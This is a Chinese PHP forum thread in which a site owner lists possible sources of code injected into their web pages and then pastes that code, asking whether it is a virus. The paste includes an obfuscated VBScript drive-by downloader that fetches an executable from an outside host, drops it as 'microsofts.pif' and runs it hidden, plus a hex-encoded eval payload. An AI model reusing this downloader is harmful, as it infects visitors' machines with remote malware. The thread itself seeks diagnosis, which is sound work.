1、你加了什么统计之类的js代码
2、IDC给你加的代码【免费空间灰常常见】
3、你文件在本地中毒后给上传上去的
4、你的服务器中毒哦
5、你当地的ISP给你推送的【电信经常干这事】
2、IDC给你加的代码【免费空间灰常常见】
3、你文件在本地中毒后给上传上去的
4、你的服务器中毒哦
5、你当地的ISP给你推送的【电信经常干这事】
解决方案 »
- 新手PHP,从哪开始下手?
- PHP正则表达式过滤有规律的字符串,如何只取出标题部分?
- 一个关于while的问题
- 一个数组查询的问题
- 原来百度的前台查询居然是用PHP,那些Java高手要掉眼镜了
- 对我来说比较复杂的oracle问题
- 请各位大侠帮个忙,是关于在数据库中提取图象,以及显示问题
- win2003+iis6+php4.3.4 isapi模式配置问题。
- 请问怎样在linux环境下的php代码中调用javascript函数?请举例,谢谢!
- 难道没有高手了吗,我的问题几个月每人回答?拨号上网把我的机子作为服务器,可是其他人就是不能访问我得网站
- 对网站访问速度的一些疑问(文件夹数量的影响)
- 问一个正则的问题
2、IDC给你加的代码【免费空间灰常常见】 不是免费空间,自己的服务器
3、你文件在本地中毒后给上传上去的 本地文件查过没变
4、你的服务器中毒哦 这个可能性很大,不怎么如何检测
5、你当地的ISP给你推送的【电信经常干这事】感觉不象
On Error Resume Next
Cike = "http://www.axgzba2.com/x/2.exe"
Set Cike2 = document.createElement("object")
Cikeid="clsid:"
Cikeidx="BD96"
Cikeid2="C556-65"
Cikeid3="A3-11D"
Cikeid4="0-98"
Cikeid5="3A-00C"
Cikeid6="04FC29E36"
Cike3="Microsoft.X"
Cike4="MLHTTp"
Cike2.SetAttribute "classid", Cikeid&Cikeidx&Cikeid2&Cikeid3&Cikeid4&Cikeid5&Cikeid6
Cike5=Cike3&Cike4
Set loveCike = Cike2.CreateObject(Cike5,"")
loveCike.Open "GET", Cike, False
loveCike.Send
Qq_123456="microsofts.pif"
Qq_123456s="microsofts.vbs"
Q123456="Scripting."
Q123456s="FileSyst"
Q123456ss="emObject"
Q123456sss="Adod"
Q123456ssss="b.stream"
Q123456sssss=Q123456sss&Q123456ssss
Set chilam = Cike2.createobject(Q123456&Q123456s&Q123456ss,"")
Set yingying = chilam.GetSpecialFolder(2)
Qq_123456=chilam.BuildPath(yingying,Qq_123456)
Qq_123456s=chilam.BuildPath(yingying,Qq_123456s)
Set chilams = Cike2.createobject(Q123456sssss,"")
chilams.type=1
chilams.Open
chilams.Write loveCike.ResponseBody
chilams.Savetofile Qq_123456,2
chilams.Close
chilams.Type=2
chilams.Open
chilams.WriteText "Set LoveCike = CreateObject(""Wscript.Shell"")"&vbCrLf&"LoveCike.run ("""&Qq_123456&""")"
chilams.Savetofile Qq_123456s,2
chilams.Close
cute="Shell.Applica"
qq="tion"
Set cute_qq = Cike2.createobject(cute&qq,"")
Qq123456="O"
Qq123456s="p"
Qq123456ss="e"
Qq123456sss="n"
cute_qq.SHellExECuTe Qq_123456s,"","",Qq123456&Qq123456s&Qq123456ss&Qq123456sss,0
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
看不懂这些代码了,不知道是那些神经弄来的
function ResumeError() {
return true;
}
window.onerror = ResumeError;
</SCRIPT>
<SCRIPT LANGUAGE="JAVASCRIPT">
eval("\x65\x76\x61\x6c\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x70\x2c\x61\x2c\x63\x2c\x6b\x2c\x65\x2c\x64\x29\x7b\x65\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x63\x29\x7b\x72\x65\x74\x75\x72\x6e\x28\x63\x3c\x61\x3f\x27\x27\x3a\x65\x28\x70\x61\x72\x73\x65\x49\x6e\x74\x28\x63\x2f\x61\x29\x29\x29\x2b\x28\x28\x63\x3d\x63\x25\x61\x29\x3e\x33\x35\x3f\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x63\x2b\x32\x39\x29\x3a\x63\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67\x28\x33\x36\x29\x29\x7d\x3b\x69\x66\x28\x21\x27\x27\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5e\x2f\x2c\x53\x74\x72\x69\x6e\x67\x29\x29\x7b\x77\x68\x69\x6c\x65\x28\x63\x2d\x2d\x29\x7b\x64\x5b\x65\x28\x63\x29\x5d\x3d\x6b\x5b\x63\x5d\x7c\x7c\x65\x28\x63\x29\x7d\x6b\x3d\x5b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x65\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x64\x5b\x65\x5d\x7d\x5d\x3b\x65\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x72\x65\x74\x75\x72\x6e\x27\x5c\x5c\x77\x2b\x27\x7d\x3b\x63\x3d\x31\x7d\x3b\x77\x68\x69\x6c\x65\x28\x63\x2d\x2d\x29\x7b\x69\x66\x28\x6b\x5b\x63\x5d\x29\x7b\x70\x3d\x70\x2e\x72
\x65\x70\x6e\x51\x75\x34\x38\x71\x75\x37\x70\x7c\x77\x68\x69\x6c\x65\x7c\x49\x6d\x70\x6f\x72\x74\x7c\x6c\x65\x6e\x67\x74\x68\x7c\x30\x38\x7c\x35\x34\x33\x7c\x61\x34\x7c\x37\x31\x7c\x35\x35\x30\x7c\x35\x34\x34\x7c\x35\x35\x32\x7c\x30\x31\x27\x2e\x73\x70\x6c\x69\x74\x28\x27\x7c\x27\x29\x2c\x30\x2c\x7b\x7d\x29\x29\x0d\x0a")
</script>病毒代码吗?谁有分析过啊?
document.write ('<script>var a9290tf="51la";var a9290pu="";var a9290pf="51la";var a9290su=window.location;var a9290sf=document.referrer;var a9290of="";var a9290op="";var a9290ops=1;var a9290ot=1;var a9290d=new Date();var a9290color="";if (navigator.appName=="Netscape"){a9290color=screen.pixelDepth;} else {a9290color=screen.colorDepth;}<\/script><script>a9290tf=top.document.referrer;<\/script><script>a9290pu =window.parent.location;<\/script><script>a9290pf=window.parent.document.referrer;<\/script><script>a9290ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a9290ops=(a9290ops==null)?1: (parseInt(unescape((a9290ops)[2]))+1);var a9290oe =new Date();a9290oe.setTime(a9290oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a9290ops+ ";path=/;expires="+a9290oe.toGMTString();a9290ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a9290ot==null){a9290ot=1;}else{a9290ot=parseInt(unescape((a9290ot)[2])); a9290ot=(a9290ops==1)?(a9290ot+1):(a9290ot);}a9290oe.setTime(a9290oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a9290ot+";path=/;expires="+a9290oe.toGMTString();<\/script><script>a9290of=a9290sf;if(a9290pf!=="51la"){a9290of=a9290pf;}if(a9290tf!=="51la"){a9290of=a9290tf;}a9290op=a9290pu;try{lainframe}catch(e){a9290op=a9290su;}document.write(\'<img style="width:0px;height:0px" src="http://vip2.51.la/go.asp?svid=37&id=1519290&tpages=\'+a9290ops+\'&ttimes=\'+a9290ot+\'&tzone=\'+(0-a9290d.getTimezoneOffset()/60)+\'&tcolor=\'+a9290color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a9290of)+\'&vpage=\'+escape(a9290op)+\'" \/>\');<\/script>');还弄些统计网站的代码,不是有人专门来整我吧